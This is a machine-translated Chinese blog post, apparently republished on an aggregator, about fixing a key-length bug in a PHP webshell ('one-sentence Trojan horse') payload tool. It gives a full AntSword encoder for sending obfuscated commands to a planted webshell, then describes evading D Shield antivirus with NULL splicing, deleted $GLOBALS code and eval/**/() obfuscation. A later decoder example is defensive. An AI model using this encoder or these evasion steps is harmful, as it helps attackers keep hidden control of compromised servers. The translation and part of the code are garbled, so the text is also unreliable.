
Why an error is reported when the submitted command is greater than 11 characters in php

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article explains why an error is reported when the command submitted in PHP is longer than 11 characters. The content is quite detailed; interested readers can use it as a reference, and I hope it is helpful.

0x01 Problem analysis

I left an Easter egg for everyone at the end of the article (anyone who read the article carefully certainly won't have been caught out by it).

Next, I will share with you how to play with the Easter egg.

In Earth Gas Brother's Payload tool, the value of key has been pasted in several times over. When we enter a Payload statement, the program serializes it, takes the ASCII code of each character, XORs it, and Base64-encodes the result. The conversion can be seen in lines 25 to 28, where the ASCII codes are obtained one character at a time through substr.

Let's see what happens when the substr function returns null.

When substr has nothing left to extract, PHP returns "empty", but after the ord conversion this becomes a real 0. Because the key in Earth Gas Brother's tool is hard-coded, once we generate a longer Payload the program starts XORing Payload characters with 0, which is obviously wrong.

0x02 Problem solving

The most effective way to solve this problem is to let the program copy and append the key dynamically, which supports payloads of unlimited length.

Here the author pastes the modified script:

0x04 Ant Sword modification and usage demonstration

Below is an Ant Sword encoder written by the author, which is used to connect to the Trojan horse.

Encoder code:

    /**
     * php::base64 Encoder
     * Create at: 13:38:35 on 2020-10-14
     */
    'use strict'
    /**
     * @param {String} pwd connection password
     * @param {Array} data payload array before processing by the encoder
     * @return {Array} data payload array after processing by the encoder
     */
    module.exports = (pwd, data, ext = {}) => {
      // ########## Please write your own code below ##########
      // the following code is a sample PHP Base64
      let obj = {
        'ak': 'aec7e489-2fbc-4b15-871f-1d686eeb80dc',
        // the remaining fields of obj (including obj.d, used below) are garbled in the source
      };
      let objStr = JSON.stringify(obj);
      // generate a random variable name
      let pass = 't';
      let t = pass.repeat(obj.d.length - 1);
      let text = '';
      for (let i = 0; i < objStr.length; i++) {
        text += String.fromCharCode(objStr.charCodeAt(i) ^ t.charCodeAt());
      }
      let key = obj.ak;
      var value = '';
      for (let i = 0; i < text.length; i++) {
        // append another copy of the key whenever it runs out
        if (!key[i]) {
          key += obj.ak;
        }
        value += String.fromCharCode(text[i].charCodeAt() ^ key[i].charCodeAt());
      }
      data[t] = Buffer.from(value).toString('base64');
      // ########## Please write your own code above ##########
      // delete the original payload
      delete data['_'];
      // return the payload array processed by the encoder
      return data;
    }

Of course, the ak value on line 15 of the encoder needs to match the key in the horse.
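An added example, not code from the original article or from Ant Sword: an analyst-side decoder for request bodies built the way the encoder above builds them, for use once the key has been recovered from the script found on disk. It assumes the layering as read from the listing (single-byte XOR with 't', then XOR with the key, then Base64); KEY and SAMPLE are constructed placeholders, and `wrap = false` reproduces the fixed-length key behaviour described in 0x01.

```javascript
// Added example: analyst-side decoder. KEY and SAMPLE are constructed placeholders.
const KEY = '00000000-0000-0000-0000-000000000000'; // not the key from the article
const INNER = 't'.charCodeAt(0);                    // inner single-byte XOR layer (assumed)

// XOR buf with key. wrap=false models the fixed-length key from 0x01: past the
// end of the key, PHP's ord('') is 0, so those bytes are left unchanged.
function xorKey(buf, key, wrap) {
  const k = Buffer.from(key, 'latin1');
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) {
    const kb = wrap ? k[i % k.length] : (i < k.length ? k[i] : 0);
    out[i] = buf[i] ^ kb;
  }
  return out;
}

// Remove (or apply) the inner layer; XOR is its own inverse.
function xorInner(buf) {
  return Buffer.from(Array.from(buf, (b) => b ^ INNER));
}

// Decode one captured parameter value with a key recovered from the dropped file.
function decodeBody(b64, key, wrap = true) {
  return xorInner(xorKey(Buffer.from(b64, 'base64'), key, wrap)).toString('latin1');
}

// With the fixed-length key, everything past keyLen is readable without the key.
function tailWithoutKey(b64, keyLen) {
  return xorInner(Buffer.from(b64, 'base64').subarray(keyLen)).toString('latin1');
}

// Build constructed test traffic by running the same two layers forward.
function buildSample(text, key, wrap) {
  return xorKey(xorInner(Buffer.from(text, 'latin1')), key, wrap).toString('base64');
}

const SAMPLE = '{"note":"constructed body, deliberately longer than the 36-byte key"}';
const fixed = buildSample(SAMPLE, KEY, false);  // behaviour described in 0x01
const wrapped = buildSample(SAMPLE, KEY, true); // behaviour after the 0x02 change
console.log(decodeBody(wrapped, KEY, true));
console.log(tailWithoutKey(fixed, KEY.length));
```

Decoding a fixed-key capture with `wrap = true` (or the reverse) yields a correct first 36 bytes followed by garbage, which is a quick way to tell which variant produced a given capture.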

Demo:

(horse password is arbitrary)

0x05 Friendly tips

The horse's traffic is very strong, but the script itself does not evade antivirus detection.

Let's take a look at the horse being hammered by D Shield:

What should I do? Bypass it, of course. Such a good girl, and the encoder is already finished; it can't be wasted!

The prompt reports an eval backdoor and points to a problem with the parameter $vv. Let's take a look:

It's simple: use the NULL splicing method (although some common horses can no longer get through with it).

The eval error is no longer reported, so there's a chance!

Now you can see an error about $GLOBALS, so let's go directly to line 6 and take a look.

That code does not affect the horse as a whole, so delete it directly!

Let's take a look at the results:

ByPass!

0x06 Bypass through the unlocking of the horse

Some analysis of Brother Geqi gave some inspiration: NULL splicing is no longer lonely, and is unrestrained once again!

We have been neglecting the question of what exactly is stored in $GLOBALS. Today, let's take a look with var_dump.

You can see that things such as $_GET/$_POST/$_COOKIE are stored in it.

At this point, the author thought of the eval/**/() format and of obfuscating some variable values, and wrote a second simple one-sentence Trojan horse.
